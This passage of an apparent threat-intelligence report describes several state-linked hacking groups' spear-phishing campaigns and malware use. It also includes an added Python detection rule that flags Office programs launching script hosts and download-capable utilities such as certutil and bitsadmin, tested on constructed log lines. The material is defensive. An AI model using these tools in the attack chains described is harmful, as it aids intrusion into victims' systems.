Among this detected activity, some malware that had been used in the past was modified, or malware produced based on open source code was used for hacking activities.

Like before, hacking activity targeted at South Korea utilized Spear Phishing, which included Microsoft Word files containing Macros, and our analysis of the malware used shows that this campaign started in early 2018. In addition, SectorB targets started to include South Korean financial companies.


3. SectorC Activity Features

A total of three hacking groups were found to be active within SectorC.

Among this detected activity, SectorC01 activity was relatively more intense than others and SectorC activity was found to be aimed at South Europe including Spain, East Asia including Japan, and Eastern Europe including Ukraine and Poland.

Although hacking activities by SectorC groups around the world were conducted mainly to obtain information related to government agencies, they seem to be targeting Eastern Europe for other purposes based on the characteristics of their malware. SectorC still uses Spear Phishing with code execution vulnerabilities in Microsoft Word files or Microsoft Word files with macros for the initial infection in order to drop variants of their usual malware, although this time they have also included variants written in a different programming language. In addition, SectorC sometimes used only script and normal utility files for attacks on Eastern Europe.
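When an intrusion uses only scripts and normal utility files, as described for the Eastern Europe activity above, the document that starts the chain still has to hand execution to a script interpreter or a built-in utility. That parent/child relationship is a useful detection point for the macro- and exploit-based Word lures this report describes. The following added example (not code from NSHC or the report) runs such a heuristic over constructed process-creation records; the record format, field order and log lines are all constructed for the example, loosely modelled on endpoint process-creation telemetry.

```python
"""Flag Office document readers spawning script hosts or utilities (added example).

Input records are constructed, pipe-separated lines:
    timestamp | parent image path | image path | command line
"""
import os
from typing import Dict, List, Optional

# Document readers named in the report's descriptions (Office and Hangul Word Processor).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "hwp.exe"}
# Script interpreters: a document launching one of these is rarely legitimate.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}
# Signed system utilities that are commonly repurposed; lower confidence than script hosts.
UTILITIES = {"certutil.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe", "msiexec.exe"}

# Constructed sample telemetry, not real log data.
SAMPLE_LOG = r"""
2019-06-03T09:12:44Z | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Windows\System32\wscript.exe | wscript.exe "C:\Users\u\AppData\Local\Temp\attach.vbs"
2019-06-03T09:12:01Z | C:\Windows\explorer.exe | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | WINWORD.EXE /n report.docx
2019-06-03T09:13:10Z | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Windows\System32\certutil.exe | certutil.exe <arguments redacted>
2019-06-03T10:02:33Z | C:\Windows\System32\cmd.exe | C:\Windows\System32\certutil.exe | certutil -hashfile file.txt SHA256
2019-06-03T10:15:07Z | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Windows\splwow64.exe | splwow64.exe 12288
"""


def basename_lower(path: str) -> str:
    """Image name in lower case; backslashes are normalised so this works off Windows too."""
    return os.path.basename(path.replace("\\", "/")).lower()


def parse_records(log_text: str) -> List[Dict[str, str]]:
    """Parse the constructed pipe-separated format; malformed lines are skipped."""
    records = []
    for line in log_text.splitlines():
        fields = [f.strip() for f in line.split(" | ")]
        if len(fields) != 4:
            continue
        records.append(dict(zip(("ts", "parent", "image", "cmdline"), fields)))
    return records


def classify(record: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert when a document reader spawns a script host or utility, else None."""
    parent = basename_lower(record["parent"])
    child = basename_lower(record["image"])
    if parent not in OFFICE_PARENTS:
        return None
    if child in SCRIPT_HOSTS:
        severity = "high"
    elif child in UTILITIES:
        severity = "medium"
    else:
        # Office legitimately spawns helpers such as the print proxy; do not alert.
        return None
    return {"ts": record["ts"], "parent": parent, "child": child,
            "severity": severity, "cmdline": record["cmdline"]}


def detect(log_text: str) -> List[Dict[str, str]]:
    """Run the heuristic over a whole log and return the alerts in log order."""
    return [a for a in (classify(r) for r in parse_records(log_text)) if a]


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ts']} {alert['parent']} -> {alert['child']}: {alert['cmdline']}")
```

The benign rows are included deliberately: a user opening Word from Explorer, an administrator hashing a file from a shell, and Excel starting the print proxy all pass, while the two Word-initiated launches are flagged at different confidence levels. In production the same rule belongs in the EDR or SIEM query language rather than a script, and the utility list should be tuned against the environment's own baseline.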


4. SectorD Activity Features

A total of four hacking groups were found to be active within SectorD, and targets were concentrated in Middle Eastern countries, including Lebanon, Oman, Jordan, Saudi Arabia, Turkey, Iraq and Israel.

In addition to the use of Phishing websites, there were also cases where Spear Phishing was used with malware in the form of Microsoft Word files containing macros.

Although SectorD groups mainly utilize script-based malware, there were cases of hacking activity targeting energy companies in Italy with ties to the Middle East, which reused the wiper malware previously used to disrupt normal system operations.


5. SectorE Activity Features

A total of three hacking groups were found to be active within SectorE, and targets were in the Central Asia region, which includes Pakistan, a political rival of SectorE, as well as Chinese companies.

The hacking activities of SectorE took advantage of vulnerabilities in Microsoft Office, or used Spear Phishing with file-based malware that exploited vulnerabilities in InPage software, along with malware in the form of Word or Excel files containing macros.

In addition, the execution of the malware is structured so that the download function runs in the first step, and the following steps only run if the first one succeeded, reducing exposure to the outside as much as possible. However, as their malware, C2 IPs and C2 domains were found to have some overlapping characteristics, it can be seen that SectorE groups share various hacking and malware production techniques.


6. SectorF Activity Features

SectorF activities were discovered targeting East Asia, including China and Japan.

They primarily utilize Spear Phishing, attaching Microsoft Word files containing macros to emails.

While some of the code used in their malware was found to have been produced based on open source code used for penetration testing, others were found to be variants of their custom malware.


The full report detailing each event together with IOCs and recommendations is available to existing NSHC Threat Recon customers.